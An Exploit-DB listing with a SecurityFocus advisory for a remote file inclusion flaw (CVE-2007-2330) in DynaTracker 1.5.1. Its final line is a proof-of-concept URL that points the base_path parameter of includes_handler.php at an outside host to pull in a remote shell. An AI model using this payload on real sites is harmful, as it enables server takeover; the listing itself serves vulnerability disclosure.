DynaTracker 1.5.1 includes_handler.php base_path Remote File Inclusion

2007-04-25T00:00:00
ID EDB-ID:29911
Type exploitdb
Reporter alijsb
Modified 2007-04-25T00:00:00

Description

DynaTracker 1.5.1 includes_handler.php base_path Remote File Inclusion. CVE-2007-2330. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/23667/info

DynaTracker is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

DynaTracker 1.5.1 is reported vulnerable; other versions may also be affected. 

http://www.example.com/DynaTracker_v151/includes_handler.php?base_path=http://shell